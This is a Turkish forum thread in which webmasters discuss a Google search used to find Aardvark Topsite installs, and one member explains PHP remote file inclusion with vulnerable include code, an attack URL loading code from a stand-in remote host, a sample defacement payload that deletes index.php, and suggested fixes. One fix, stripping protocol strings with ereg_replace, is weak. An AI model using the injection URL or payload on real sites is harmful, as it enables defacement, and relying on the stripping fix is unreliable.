index.php?a=join

ya arkadaşlar birinin google da böyle bir arama yapması nedendir acep?

extreme de
http://www.google.com.tr/search?q=index.php?a=join&hl=tr&lr=lang_tr&start=10&sa=N
böyle aramayla hit geliyo benim topliste

sorunmudur? birileri bişeymi yapmaya çalışmaktadır yoksa
aardvark toplistlerimi listelemek istemektedir?

nedir yani?

aadvark siteleri listelemek. aadvark toplistte açık var, bunlardan yararlanmak istiyor herkes.

bence o scripti kullanan siteleri bulmak için öyle bi arama yapmıştır(ben bi script için denemiştim de orda biliyorum )

Böyle bir aramayı bende yapmıştım eskiden, bu doğal birşey kayıt formunu bulmak için ve böylece toplistlere ulaşmak için olabilir..

ploop' Alıntı:

aadvark siteleri listelemek. aadvark toplistte açık var, bunlardan yararlanmak istiyor herkes.

Genişletmek için tıkla ...

ne gibi bir açık ve bulduklarında ne yapıyorlar.
açabilirmisin biraz.

Genel olarak phpdeki include komutunun ucu acik sekilde kullanildigi sistemlere baska bir ortamdan kod cagirtarak sistemi heklemek icin kullaniliyor.

bundan korunmanın çaresi varmıdır acep

greyder' Alıntı:

ne gibi bir açık ve bulduklarında ne yapıyorlar.
açabilirmisin biraz.

Genişletmek için tıkla ...

benim bildiğim bir üye olma heki, bir de sıralamada yükselme heki var.

ploop' Alıntı:

benim bildiğim bir üye olma heki, bir de sıralamada yükselme heki var.

Genişletmek için tıkla ...

ben de (en son deneme 6 ay olmuştur) admin giriş bölümünde oturum açma ile ilgili bir açık olduğunu bulmuştum (admin paneline giriş yapılabiliyordu), aardvark toplist bence kullanılmamalı.

ploop' Alıntı:

benim bildiğim bir üye olma heki, bir de sıralamada yükselme heki var.

Genişletmek için tıkla ...

Evet ! bunu cok gordum sitemde. Olmadık bir site en basta hatta kodu koymamıs Hatta ben onaylamadan listede gorunuyor hemen siliorum bolelerini tabi.

Kucuk bir ornek vereyim;
Sistemde index.php uyeler.php ve merhaba.php dosyalari var ve siz index.php icerisinde bir tablo olusturup uyeler dosyasinin icindeki bilgileri index.php de gostermek istiyorsunuz.

index.php icindeki kodlar

html kodlari
tablo ac
<?
include("$sayfa.php");
?>
tablo kapat
html kodlari

Genişletmek için tıkla ...

simdi en ustde belirttigim islemi yapmak icin su sekilde yazmak yetecektir

http://siteadi.com/index.php?sayfa=uyeler

Genişletmek için tıkla ...

Boylece ana sayfanin icinde istedigimiz kisimda uyeler.php dosyasini yayimlamis olduk.

Peki adres cubuguna sunu yazarsak nolur?

http://siteadi.com/index.php?sayfa=http://baskabirsite.com/uyeler

Genişletmek için tıkla ...

bu kez sistem baskabirsite.com altinda uyeler.php dosyasini cagiracaktir. Ve! eger diger sitedeki uyeler.php icinde zararli kodlar varsa,
Ornek olarak

<?
unlink(index.php);
touch(index.php);
fopen(index.php,a);
fputs(index.php, bu site hekkenmiştir.);
fclose(index.php);
?>

Genişletmek için tıkla ...

baskabirsite.com/uyeler.php icerisinde yukarida belirttigim komutlar bulundugunda. once kendi index.php dosyaniz silinecek ve yerine sitenizin heklenmis oldugunu belirten bir text yazilabilecektir.

Umarim include komutunun yanlis kullanildiginda nelere yol acabilecegini anlatabilmisimdir.

Kolay gelsin arkadaslar.

harika.İyi ibr bilgi buna göre yazalım kodlarımızı.Aklıma gelmemişti böyle birşey.

Kisitli sayida sayfaniz varsa tanimladiginiz kadar sayfayi asagidaki gibi goruntulersiniz tanimlanmamislar zaten gozukmez,

if ($sayfa == uyeler) { include("uyeler.php"); }
if ($sayfa == sayfa4) { include("sayfa4.php"); }
if ($sayfa == uyeler4) { include("uyeler4.php"); }

Genişletmek için tıkla ...

yok bir cok sayfa var ve her sayfa icin bir tanim yapamam diyorsaniz uzak sitelerdeki dosyalari cekememek icin bilindik protokolleri ereg() veya ereg_replace() ile strip ederek engellemis olursunuz, asagidaki gibi

$sayfa = ereg_replace("http://","",$sayfa);
$sayfa = ereg_replace("ftp://","",$sayfa);
$sayfa = ereg_replace("https://","",$sayfa);
include("$sayfa.php");

Genişletmek için tıkla ...

bu sekilde uzaktan bir dosya cekilmek istendiginde yukaridaki ereg_replace sayesinde protokol kisimlari silinmis olacaktir ve dosyayi uzaktan cekemeyecektir.

En basit açık ...Otomatik olarak listelemesi ...Komplike açıklarını bilmiyorum